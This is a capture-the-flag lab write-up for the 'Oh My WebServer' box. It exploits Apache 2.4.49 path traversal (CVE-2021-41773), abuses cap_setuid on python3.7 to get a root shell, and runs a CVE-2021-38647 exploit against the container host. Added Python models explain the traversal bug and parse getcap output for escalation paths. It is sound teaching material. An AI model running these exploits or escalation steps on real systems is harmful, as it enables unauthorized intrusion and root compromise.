Oh My WebServer
Initial Scan
root@ip-10-10-4-90:~# rustscan -a 10.10.195.101 -- -sC -sV
RustScan - The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size
Open 10.10.195.101:22
Open 10.10.195.101:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; p
80/tcp open http syn-ack Apache httpd 2.4.49 ((Unix))
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
|_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access
root@ip-10-10-4-90:~# curl -X TRACE -H "X-Header: Attila21" 10.10.195.101
TRACE / HTTP/1.1
Host: 10.10.195.101
User-Agent: curl/7.58.0
Accept: */*
X-Header: Attila21
root@ip-10-10-4-90:~#
curl 'http://10.10.195.101/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%
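The request above is the CVE-2021-41773 path traversal against Apache 2.4.49 (the Qualys post linked at the end describes it). The httpd container exposes /cgi-bin/ through a ScriptAlias; the server's path normalization (ap_normalize_path) tested segments for ".." before the encoded dot in ".%2e" had been decoded, so the segment passed the check and only became ".." when the filesystem path was built. Where mod_cgi is enabled, the same traversal reaching /bin/sh with a POST body gives code execution as the httpd user, which is how the daemon shell in the next section was obtained. The Python below is an added example, not part of the writeup or of Apache: a simplified model of the ordering bug, of the incomplete 2.4.50 fix bypassed by double encoding (CVE-2021-42013), and of a normalization that refuses both. The document root, the alias target and the single downstream decode are assumptions of the model, not the real box's configuration.

```python
from urllib.parse import unquote
import posixpath

# Assumed server layout (constructed for the model; the box's httpd.conf is not on the page).
DOCROOT = "/usr/local/apache2/htdocs"
SCRIPT_ALIASES = {"/cgi-bin/": "/usr/local/apache2/cgi-bin/"}


def check_path(uri, model):
    """Model of the normalization step that is supposed to reject '..' segments.

    model = "2.4.49": the check runs on the still-encoded path, so a segment written
                       as '.%2e' is not recognised (CVE-2021-41773).
    model = "2.4.50": the path is decoded once before the check, so '.%2e' is caught,
                       but '.%%32%65' decodes to '.%2e' and slips through (CVE-2021-42013).
    model = "fixed":   decode once, refuse anything that a further decode would still
                       change (nothing left for a later stage to decode), then refuse '..'.
    Returns the normalized path, or None when the request is rejected (HTTP 403).
    """
    path = uri
    if model in ("2.4.50", "fixed"):
        path = unquote(path)
    if model == "fixed" and unquote(path) != path:
        return None  # double encoding: reject rather than let a downstream stage decode it
    if any(segment == ".." for segment in path.split("/")):
        return None
    return path


def map_to_filesystem(normalized):
    """Model of alias mapping followed by the one extra decode a downstream handler
    (standing in for mod_cgi here) performs before touching the filesystem."""
    for prefix, target in SCRIPT_ALIASES.items():
        if normalized.startswith(prefix):
            fs_path = target + normalized[len(prefix):]
            break
    else:
        fs_path = DOCROOT + normalized
    fs_path = unquote(fs_path)            # the late decode that turns '%2e' into '.'
    return posixpath.normpath(fs_path)    # lexical '..' collapse, clamped at '/'


def resolve(uri, model):
    """Whole pipeline: None if rejected, otherwise the filesystem path that would be opened."""
    normalized = check_path(uri, model)
    if normalized is None:
        return None
    return map_to_filesystem(normalized)


def escapes(fs_path):
    """True when the resolved path lies outside every directory the server is meant to serve."""
    allowed = [DOCROOT] + list(SCRIPT_ALIASES.values())
    return not any(fs_path.startswith(root.rstrip("/") + "/") for root in allowed)


def probe_uri(target="/etc/passwd", depth=4, double_encoded=False):
    """Build the traversal URI shape used in the writeup: the cgi-bin alias followed by
    `depth` encoded '..' segments. Four climb out of /usr/local/apache2/cgi-bin/; extra
    ones (the writeup uses many more) are harmless because normpath clamps at '/'."""
    dotdot = ".%%32%65" if double_encoded else ".%2e"
    return "/cgi-bin/" + "/".join([dotdot] * depth) + target


if __name__ == "__main__":
    for model in ("2.4.49", "2.4.50", "fixed"):
        for uri in (probe_uri(), probe_uri(double_encoded=True), "/index.html"):
            fs = resolve(uri, model)
            if fs is None:
                verdict = "rejected"
            else:
                verdict = ("TRAVERSAL -> " if escapes(fs) else "ok -> ") + fs
            print(f"{model:7} {uri:48} {verdict}")
```

Run it and the three rows per model show why only the last one is safe: decoding before the check is necessary but not sufficient as long as a later component decodes again, which is the lesson of CVE-2021-42013.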
Privilege Escalation
daemon@4a70924bafa0:/dev/shm$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
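A cap_setuid capability that is both permitted and effective (+ep) on an interpreter means any unprivileged user who can run it can call setuid(0), which is the GTFOBins capabilities entry linked at the end of this writeup. As an added example (not part of the writeup or of GTFOBins), the Python below parses getcap -r output, flags root-equivalent capabilities that are actually usable by a non-capability-aware program, and wraps the setuid step so it reports failure instead of crashing. The sample getcap lines other than the python3.7 one, and the set of capabilities treated as root-equivalent, are constructed for the example.

```python
import os

# Capabilities that by themselves let the holder become root or bypass file permissions
# (selection made for this example).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
}

# Constructed sample: the first line is the one found on the box, the rest are made up to
# cover both output formats getcap has used ("path = caps" in older libcap, "path caps" in newer).
SAMPLE_GETCAP = """\
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/gdb cap_sys_ptrace=p
"""


def parse_capset(text):
    """'cap_setuid,cap_setgid+ep' -> {'cap_setuid': 'ep', 'cap_setgid': 'ep'}.
    Each clause is <names>[+=-]<flags>; flags are e (effective), p (permitted), i (inheritable)."""
    caps = {}
    for clause in text.split():
        names, flags = clause, ""
        for sep in "+=-":
            if sep in clause:
                names, flags = clause.split(sep, 1)
                break
        for name in names.split(","):
            if name:
                caps[name] = flags
    return caps


def parse_getcap(output):
    """Map each path in `getcap -r` output to its parsed capability set."""
    entries = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, capset = line.split(" = ", 1)      # older libcap format
        else:
            path, _, capset = line.rpartition(" ")  # newer format (paths containing spaces not handled)
        entries[path] = parse_capset(capset)
    return entries


def root_equivalent_binaries(output):
    """(path, capability) pairs worth chasing: root-equivalent and both permitted and
    effective, so a program that never calls capset() still gets it at exec time."""
    hits = []
    for path, caps in sorted(parse_getcap(output).items()):
        for cap, flags in caps.items():
            if cap in ROOT_EQUIVALENT and "e" in flags and "p" in flags:
                hits.append((path, cap))
    return hits


def is_root():
    return os.geteuid() == 0


def try_setuid_root():
    """The GTFOBins cap_setuid step, wrapped. With CAP_SETUID effective, setuid(0)
    succeeds for any caller; without it the kernel returns EPERM."""
    try:
        os.setuid(0)
    except PermissionError:
        return False
    return is_root()


if __name__ == "__main__":
    for path, cap in root_equivalent_binaries(SAMPLE_GETCAP):
        print(f"{path}: {cap} is permitted+effective")
    if try_setuid_root():
        os.execv("/bin/sh", ["/bin/sh"])  # equivalent to GTFOBins: os.setuid(0); os.system("/bin/sh")
    else:
        print("this interpreter has no CAP_SETUID; run the script with the capable one, e.g. /usr/bin/python3.7")
```

Note the gdb line: cap_sys_ptrace=p alone is not flagged, because a permitted-but-not-effective capability is useless to a binary that does not raise it itself.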
Further Enumeration
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 9134 bytes 2365947 (2.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9683 bytes 10622282 (10.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
python3 exp.py -t 172.17.0.1 -c 'whoami;pwd;id;hostname;uname -a;cat /root/root
id
root
/var/opt/microsoft/scx/tmp
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
THM{7f147ef1f36da9ae29529890a1b6011f}
Creds
Services User names Passwords
Exploit links
https://github.com/AlteredSecurity/CVE-2021-38647
python | GTFOBins
The payloads are compatible with both Python version 2 and 3. It can be used to break out from
restricted environments by spawning an interactive system shell. It can send back a reverse shell to a
listening attacker to open a remote network access. Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
https://gtfobins.github.io/gtfobins/python/#capabilities
https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013